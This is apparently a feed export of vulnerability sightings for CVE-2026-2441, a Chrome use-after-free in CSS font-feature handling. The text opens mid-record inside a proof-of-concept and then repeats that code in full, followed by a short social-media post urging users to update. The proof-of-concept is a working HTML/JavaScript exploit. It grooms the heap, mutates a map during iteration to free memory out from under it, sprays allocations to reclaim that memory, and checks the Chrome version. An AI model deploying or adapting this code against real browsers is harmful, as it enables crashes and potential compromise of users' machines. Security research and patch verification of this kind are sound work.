// In unpatched Blink, the aliases_ pointer becomes dangling after this.\n \n // Delete the current key\n map.delete(key);\n\n // Add many new keys \u2192 force rehash\n // WTF::HashMap default load factor ~0.75; 512+ entries will definitely trigger rehash\n // Each set() call potentially reallocates internal storage\n for (let i = 0; i < 512; i++) {\n map.set(\"spray_\" + step + \"_\" + i, [i, i + 1, i + 2]);\n }\n\n // Also modify groom objects \u2014 fill the freed memory\n for (let g = 0; g < groomRules.length; g++) {\n try {\n groomRules[g].styleset.set(\"reclaim_\" + step + \"_\" + g, [step]);\n } catch(e) {}\n }\n\n step++;\n }\n\n print(\"\");\n print(\"[+] Iteration completed (\" + iterationCount + \" entries processed).\", \"ok\");\n\n} catch (e) {\n crashDetected = true;\n print(\"[!] EXCEPTION caught: \" + e.message, \"fail\");\n print(\"[!] This may be the UAF manifesting at the JavaScript layer.\", \"fail\");\n}\n\n// \u2500\u2500\u2500 4. Results \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprint(\"\");\nprint(\"\u2500\".repeat(60), \"info\");\nprint(\"[*] RESULTS:\", \"info\");\n\nconst ua = navigator.userAgent;\nconst chromeMatch = ua.match(/Chrome\\/([\\d.]+)/);\nconst chromeVersion = chromeMatch ? chromeMatch[1] : \"unknown\";\nprint(\"[*] Chrome version: \" + chromeVersion, \"info\");\n\n// Version comparison\n// Dev/Canary builds have build number 0: 145.0.0.0\n// In that case major.minor is not enough, full build number is required.\nfunction parseVersion(v) {\n const parts = v.split(\".\").map(Number);\n return {\n major: parts[0] || 0,\n minor: parts[1] || 0,\n build: parts[2] || 0,\n patch: parts[3] || 0,\n isDevBuild: (parts[2] === 0 && parts[3] === 0)\n };\n}\n\nfunction isVulnerable(vStr) {\n const v = parseVersion(vStr);\n // Dev/Canary build (x.x.0.0): receives upstream fix early, considered safe\n if (v.isDevBuild) return false;\n // major < 145 \u2192 definitely vulnerable\n if (v.major < 145) return true;\n // major > 145 \u2192 patched\n if (v.major > 145) return false;\n // major === 145: check build number\n if (v.build < 7632) return true;\n if (v.build > 7632) return false;\n // build === 7632: check patch\n return v.patch < 75;\n}\n\nif (chromeMatch) {\n const v = parseVersion(chromeVersion);\n if (v.isDevBuild) {\n print(\"[?] Dev/Canary build detected (\" + chromeVersion + \").\", \"warn\");\n print(\"[?] Dev builds receive upstream fixes early \u2014 likely PATCHED.\", \"warn\");\n print(\"[?] Use stable/beta channel (<= 144.0.x) for accurate testing.\", \"warn\");\n } else if (isVulnerable(chromeVersion)) {\n print(\"[!] THIS VERSION IS VULNERABLE! (\" + chromeVersion + \" < 145.0.7632.75)\", \"fail\");\n print(\"[!] Renderer crash expected \u2014 if no crash occurred, sandbox or other\", \"fail\");\n print(\"[!] mitigations may have altered the trigger conditions.\", \"fail\");\n } else {\n print(\"[+] This version is patched. (\" + chromeVersion + \" >= 145.0.7632.75)\", \"ok\");\n print(\"[+] No crash expected \u2014 the fix prevents iterator invalidation.\", \"ok\");\n }\n} else {\n print(\"[?] Chrome version could not be detected.\", \"warn\");\n}\n\nif (crashDetected) {\n print(\"[!] Exception detected \u2014 UAF was partially triggered.\", \"fail\");\n} else {\n print(\"[+] No exception \u2014 either patched version, or the crash killed the renderer\", \"ok\");\n print(\" (if the renderer crashed, this line would never execute).\", \"ok\");\n}\n\nprint(\"\");\nprint(\"[*] Commit: 63f3cb4864c64c677cd60c76c8cb49d37d08319c\", \"info\");\nprint(\"[*] Diff: css_font_feature_values_map.cc\", \"info\");\nprint(\"[*] Fix: const FontFeatureAliases* \u2192 const FontFeatureAliases (deep copy)\", \"info\");\nprint(\"\u2500\".repeat(60), \"info\");\n\n// \u2500\u2500\u2500 5. Alternative trigger via for...of \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// Some Blink versions use a different code path for for...of iteration.\nprint(\"\");\nprint(\"[*] Alternative trigger: for...of + concurrent mutation...\", \"info\");\n\ntry {\n // Retry with a fresh map\n const style2 = document.createElement(\"style\");\n document.head.appendChild(style2);\n style2.sheet.insertRule(\n `@font-feature-values AltFont {\n @styleset { x1: 10; x2: 20; x3: 30; x4: 40; x5: 50; }\n }`, 0\n );\n const rule2 = style2.sheet.cssRules[0];\n const map2 = rule2.styleset;\n\n let altCount = 0;\n for (const [k, v] of map2) {\n altCount++;\n // Mutation during iteration\n map2.delete(k);\n for (let i = 0; i < 512; i++) {\n map2.set(\"alt_\" + altCount + \"_\" + i, [i, i]);\n }\n if (altCount >= 5) break;\n }\n print(\"[+] for...of completed (\" + altCount + \" iterations).\", \"ok\");\n} catch(e) {\n print(\"[!] for...of exception: \" + e.message, \"fail\");\n}\n\n// \u2500\u2500\u2500 6. Async trigger via requestAnimationFrame \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// Forces layout recalculation via offsetWidth inside a rAF loop,\n// re-triggering the CSS engine.\nprint(\"\");\nprint(\"[*] Starting rAF + layout recalc trigger...\", \"info\");\n\nconst style3 = document.createElement(\"style\");\ndocument.head.appendChild(style3);\nstyle3.sheet.insertRule(\n `@font-feature-values RafFont {\n @styleset { r1: 1; r2: 2; r3: 3; r4: 4; r5: 5; }\n }`, 0\n);\nconst rule3 = style3.sheet.cssRules[0];\nconst map3 = rule3.styleset;\n\nlet rafCount = 0;\nlet rafIterator = map3.entries();\n\nfunction rafTrigger() {\n if (rafCount >= 10) {\n print(\"[+] rAF trigger completed (\" + rafCount + \" frames).\", \"ok\");\n print(\"\");\n print(\"[*] PoC finished. See results above.\", \"info\");\n print(\"\");\n print(\"[*] SUMMARY:\", \"info\");\n print(\"[*] Vulnerable : Chrome <= 144.x (stable) or < 145.0.7632.75\", \"info\");\n print(\"[*] Patched : Chrome >= 145.0.7632.75 (stable)\", \"info\");\n print(\"[*] Dev build : e.g. 145.0.0.0 \u2014 receives upstream fix early\", \"info\");\n print(\"[*] No crash : Version is patched OR renderer silently crashed\", \"info\");\n print(\"[*] Crash : UAF successfully triggered\", \"info\");\n return;\n }\n\n // Force layout recalc \u2014 re-trigger CSS engine\n void document.body.offsetWidth;\n\n // Iterator step\n const result = rafIterator.next();\n if (!result.done) {\n const [k] = result.value;\n map3.delete(k);\n for (let i = 0; i < 512; i++) {\n map3.set(\"raf_\" + rafCount + \"_\" + i, [rafCount, i]);\n }\n }\n\n rafCount++;\n requestAnimationFrame(rafTrigger);\n}\n\nrequestAnimationFrame(rafTrigger);\n\n\n", "creation_timestamp": "2026-05-12T12:28:42.000000Z"} {"uuid": "47f30829-10ce-4301-9954-33b946dd69c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2441", "type": "seen", "source": "https://gist.github.com/lyubeka99/e1b282e74e4000fe00489eb03e58a731", "content": "\n\n\n\n \n CVE-2026-2441 PoC \u2014 CSSFontFeatureValuesMap UAF\n \n body { font-family: monospace; background: #111; color: #0f0; padding: 20px; }\n #log { white-space: pre; font-size: 13px; }\n .ok { color: #0f0; }\n .warn { color: #ff0; }\n .fail { color: #f44; }\n .info { color: #08f; }\n \n\n \n \n @font-feature-values VulnTestFont {\n @styleset {\n entry_a: 1;\n entry_b: 2;\n entry_c: 3;\n entry_d: 4;\n entry_e: 5;\n entry_f: 6;\n entry_g: 7;\n entry_h: 8;\n }\n }\n \n\n\n\nCVE-2026-2441 \u2014 CSSFontFeatureValuesMap UAF PoC\n\n\n\n\n\"use strict\";\n\nconst log = document.getElementById(\"log\");\nfunction print(msg, cls = \"\") {\n const span = document.createElement(\"span\");\n span.className = cls;\n span.textContent = msg + \"\\n\";\n log.appendChild(span);\n}\n\nprint(\"[*] CVE-2026-2441 PoC starting...\", \"info\");\nprint(\"[*] Target: CSSFontFeatureValuesMap iterator invalidation (UAF)\", \"info\");\nprint(\"[*] Blink source: css_font_feature_values_map.cc\", \"info\");\nprint(\"\");\n\n// \u2500\u2500\u2500 1. Obtain the CSSOM object \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nconst sheet = document.getElementById(\"target-style\").sheet;\nif (!sheet || sheet.cssRules.length === 0) {\n print(\"[!] ERROR: @font-feature-values rule not found.\", \"fail\");\n throw new Error(\"CSS rule not found\");\n}\n\nconst rule = sheet.cssRules[0];\nprint(\"[+] CSSFontFeatureValuesRule found: \" + rule.fontFamily, \"ok\");\n\n// CSSFontFeatureValuesMap object\n// In Blink, this object is a CSSOM wrapper around the FontFeatureAliases HashMap.\nconst map = rule.styleset;\nif (!map) {\n print(\"[!] ERROR: rule.styleset is not accessible. Browser may not support this API.\", \"fail\");\n throw new Error(\"styleset not available\");\n}\nprint(\"[+] CSSFontFeatureValuesMap obtained. Size: \" + map.size, \"ok\");\nprint(\"\");\n\n// \u2500\u2500\u2500 2. Heap Grooming \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// Goal: Bring the heap into a predictable state.\n// By creating multiple @font-feature-values rules, we allocate same-sized\n// FontFeatureAliases objects. This facilitates memory reclaim after the UAF.\nprint(\"[*] Starting heap grooming...\", \"info\");\n\nconst groomRules = [];\nconst groomStyle = document.createElement(\"style\");\ndocument.head.appendChild(groomStyle);\n\nfor (let i = 0; i < 50; i++) {\n groomStyle.sheet.insertRule(\n `@font-feature-values GroomFont${i} { @styleset { g${i}: ${i}; } }`,\n groomStyle.sheet.cssRules.length\n );\n groomRules.push(groomStyle.sheet.cssRules[groomStyle.sheet.cssRules.length - 1]);\n}\nprint(\"[+] \" + groomRules.length + \" groom objects created.\", \"ok\");\n\n// \u2500\u2500\u2500 3. UAF Trigger \u2014 Iterator Invalidation \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n//\n// Vulnerability mechanism (unpatched Blink):\n//\n// When CreateIterationSource() is called:\n// FontFeatureValuesMapIterationSource(map, aliases_)\n// \u2192 aliases_ (raw pointer) points to the internal HashMap\n// \u2192 iterator_ = aliases_->begin()\n//\n// When FetchNextItem() is called:\n// \u2192 iterator_->key is read\n//\n// If map.delete() or map.set() is called in between:\n// \u2192 HashMap rehashes (new allocation, old storage freed)\n// \u2192 aliases_ now points to freed memory (dangling pointer)\n// \u2192 iterator_ is also invalidated\n// \u2192 Next FetchNextItem() \u2192 USE-AFTER-FREE \u2192 CRASH\n//\nprint(\"[*] Starting UAF trigger...\", \"info\");\nprint(\"[*] Strategy: iterator.next() + map.delete() + map.set() x N (force rehash)\", \"info\");\nprint(\"\");\n\nlet crashDetected = false;\nlet iterationCount = 0;\n\ntry {\n // Create iterator \u2014 at this point Blink creates an IterationSource with a raw pointer\n const iterator = map.entries();\n\n let step = 0;\n while (step < 20) {\n // iterator.next() \u2192 FetchNextItem() call\n // Unpatched Blink: reads through dangling pointer\n const result = iterator.next();\n \n if (result.done) {\n print(\" [.] Iterator exhausted (step=\" + step + \")\", \"warn\");\n break;\n }\n\n const [key, value] = result.value;\n iterationCount++;\n print(\" [>] Entry: \" + key + \" = \" + JSON.stringify(value) + \" (step=\" + step + \")\", \"ok\");\n\n // \u2500\u2500 MUTATION: Modify the HashMap \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n // This triggers a HashMap rehash.\n // In unpatched Blink, the aliases_ pointer becomes dangling after this.\n \n // Delete the current key\n map.delete(key);\n\n // Add many new keys \u2192 force rehash\n // WTF::HashMap default load factor ~0.75; 512+ entries will definitely trigger rehash\n // Each set() call potentially reallocates internal storage\n for (let i = 0; i < 512; i++) {\n map.set(\"spray_\" + step + \"_\" + i, [i, i + 1, i + 2]);\n }\n\n // Also modify groom objects \u2014 fill the freed memory\n for (let g = 0; g < groomRules.length; g++) {\n try {\n groomRules[g].styleset.set(\"reclaim_\" + step + \"_\" + g, [step]);\n } catch(e) {}\n }\n\n step++;\n }\n\n print(\"\");\n print(\"[+] Iteration completed (\" + iterationCount + \" entries processed).\", \"ok\");\n\n} catch (e) {\n crashDetected = true;\n print(\"[!] EXCEPTION caught: \" + e.message, \"fail\");\n print(\"[!] This may be the UAF manifesting at the JavaScript layer.\", \"fail\");\n}\n\n// \u2500\u2500\u2500 4. Results \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nprint(\"\");\nprint(\"\u2500\".repeat(60), \"info\");\nprint(\"[*] RESULTS:\", \"info\");\n\nconst ua = navigator.userAgent;\nconst chromeMatch = ua.match(/Chrome\\/([\\d.]+)/);\nconst chromeVersion = chromeMatch ? chromeMatch[1] : \"unknown\";\nprint(\"[*] Chrome version: \" + chromeVersion, \"info\");\n\n// Version comparison\n// Dev/Canary builds have build number 0: 145.0.0.0\n// In that case major.minor is not enough, full build number is required.\nfunction parseVersion(v) {\n const parts = v.split(\".\").map(Number);\n return {\n major: parts[0] || 0,\n minor: parts[1] || 0,\n build: parts[2] || 0,\n patch: parts[3] || 0,\n isDevBuild: (parts[2] === 0 && parts[3] === 0)\n };\n}\n\nfunction isVulnerable(vStr) {\n const v = parseVersion(vStr);\n // Dev/Canary build (x.x.0.0): receives upstream fix early, considered safe\n if (v.isDevBuild) return false;\n // major < 145 \u2192 definitely vulnerable\n if (v.major < 145) return true;\n // major > 145 \u2192 patched\n if (v.major > 145) return false;\n // major === 145: check build number\n if (v.build < 7632) return true;\n if (v.build > 7632) return false;\n // build === 7632: check patch\n return v.patch < 75;\n}\n\nif (chromeMatch) {\n const v = parseVersion(chromeVersion);\n if (v.isDevBuild) {\n print(\"[?] Dev/Canary build detected (\" + chromeVersion + \").\", \"warn\");\n print(\"[?] Dev builds receive upstream fixes early \u2014 likely PATCHED.\", \"warn\");\n print(\"[?] Use stable/beta channel (<= 144.0.x) for accurate testing.\", \"warn\");\n } else if (isVulnerable(chromeVersion)) {\n print(\"[!] THIS VERSION IS VULNERABLE! (\" + chromeVersion + \" < 145.0.7632.75)\", \"fail\");\n print(\"[!] Renderer crash expected \u2014 if no crash occurred, sandbox or other\", \"fail\");\n print(\"[!] mitigations may have altered the trigger conditions.\", \"fail\");\n } else {\n print(\"[+] This version is patched. (\" + chromeVersion + \" >= 145.0.7632.75)\", \"ok\");\n print(\"[+] No crash expected \u2014 the fix prevents iterator invalidation.\", \"ok\");\n }\n} else {\n print(\"[?] Chrome version could not be detected.\", \"warn\");\n}\n\nif (crashDetected) {\n print(\"[!] Exception detected \u2014 UAF was partially triggered.\", \"fail\");\n} else {\n print(\"[+] No exception \u2014 either patched version, or the crash killed the renderer\", \"ok\");\n print(\" (if the renderer crashed, this line would never execute).\", \"ok\");\n}\n\nprint(\"\");\nprint(\"[*] Commit: 63f3cb4864c64c677cd60c76c8cb49d37d08319c\", \"info\");\nprint(\"[*] Diff: css_font_feature_values_map.cc\", \"info\");\nprint(\"[*] Fix: const FontFeatureAliases* \u2192 const FontFeatureAliases (deep copy)\", \"info\");\nprint(\"\u2500\".repeat(60), \"info\");\n\n// \u2500\u2500\u2500 5. Alternative trigger via for...of \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// Some Blink versions use a different code path for for...of iteration.\nprint(\"\");\nprint(\"[*] Alternative trigger: for...of + concurrent mutation...\", \"info\");\n\ntry {\n // Retry with a fresh map\n const style2 = document.createElement(\"style\");\n document.head.appendChild(style2);\n style2.sheet.insertRule(\n `@font-feature-values AltFont {\n @styleset { x1: 10; x2: 20; x3: 30; x4: 40; x5: 50; }\n }`, 0\n );\n const rule2 = style2.sheet.cssRules[0];\n const map2 = rule2.styleset;\n\n let altCount = 0;\n for (const [k, v] of map2) {\n altCount++;\n // Mutation during iteration\n map2.delete(k);\n for (let i = 0; i < 512; i++) {\n map2.set(\"alt_\" + altCount + \"_\" + i, [i, i]);\n }\n if (altCount >= 5) break;\n }\n print(\"[+] for...of completed (\" + altCount + \" iterations).\", \"ok\");\n} catch(e) {\n print(\"[!] for...of exception: \" + e.message, \"fail\");\n}\n\n// \u2500\u2500\u2500 6. Async trigger via requestAnimationFrame \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n// Forces layout recalculation via offsetWidth inside a rAF loop,\n// re-triggering the CSS engine.\nprint(\"\");\nprint(\"[*] Starting rAF + layout recalc trigger...\", \"info\");\n\nconst style3 = document.createElement(\"style\");\ndocument.head.appendChild(style3);\nstyle3.sheet.insertRule(\n `@font-feature-values RafFont {\n @styleset { r1: 1; r2: 2; r3: 3; r4: 4; r5: 5; }\n }`, 0\n);\nconst rule3 = style3.sheet.cssRules[0];\nconst map3 = rule3.styleset;\n\nlet rafCount = 0;\nlet rafIterator = map3.entries();\n\nfunction rafTrigger() {\n if (rafCount >= 10) {\n print(\"[+] rAF trigger completed (\" + rafCount + \" frames).\", \"ok\");\n print(\"\");\n print(\"[*] PoC finished. See results above.\", \"info\");\n print(\"\");\n print(\"[*] SUMMARY:\", \"info\");\n print(\"[*] Vulnerable : Chrome <= 144.x (stable) or < 145.0.7632.75\", \"info\");\n print(\"[*] Patched : Chrome >= 145.0.7632.75 (stable)\", \"info\");\n print(\"[*] Dev build : e.g. 145.0.0.0 \u2014 receives upstream fix early\", \"info\");\n print(\"[*] No crash : Version is patched OR renderer silently crashed\", \"info\");\n print(\"[*] Crash : UAF successfully triggered\", \"info\");\n return;\n }\n\n // Force layout recalc \u2014 re-trigger CSS engine\n void document.body.offsetWidth;\n\n // Iterator step\n const result = rafIterator.next();\n if (!result.done) {\n const [k] = result.value;\n map3.delete(k);\n for (let i = 0; i < 512; i++) {\n map3.set(\"raf_\" + rafCount + \"_\" + i, [rafCount, i]);\n }\n }\n\n rafCount++;\n requestAnimationFrame(rafTrigger);\n}\n\nrequestAnimationFrame(rafTrigger);\n\n\n", "creation_timestamp": "2026-05-12T12:28:42.000000Z"} https://vulnerability.circl.lu/sighting/47f30829-10ce-4301-9954-33b946dd69c7/export Tue, 12 May 2026 12:28:42 +0000 53491f01-047f-4e3c-9897-8df1e31514b0 https://vulnerability.circl.lu/sighting/53491f01-047f-4e3c-9897-8df1e31514b0/export {"uuid": "53491f01-047f-4e3c-9897-8df1e31514b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-2441", "type": "seen", "source": "https://bsky.app/profile/steelwise.bsky.social/post/3mmqmwbr2sv2u", "content": "Chrome's first zero-day of 2026: update now, don't wait. CVE-2026-2441 is actively being exploited in the wild. A use-after-free bug in CSS handling means a crafted webpage is all it takes. Push the update now. https://steelwise.uk/filings/chrome-zero-day-cve-2026-2441-update-now/", "creation_timestamp": "2026-05-26T09:00:05.638267Z"} {"uuid": "53491f01-047f-4e3c-9897-8df1e31514b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-2441", "type": "seen", "source": "https://bsky.app/profile/steelwise.bsky.social/post/3mmqmwbr2sv2u", "content": "Chrome's first zero-day of 2026: update now, don't wait. CVE-2026-2441 is actively being exploited in the wild. A use-after-free bug in CSS handling means a crafted webpage is all it takes. Push the update now. https://steelwise.uk/filings/chrome-zero-day-cve-2026-2441-update-now/", "creation_timestamp": "2026-05-26T09:00:05.638267Z"} https://vulnerability.circl.lu/sighting/53491f01-047f-4e3c-9897-8df1e31514b0/export Tue, 26 May 2026 09:00:05 +0000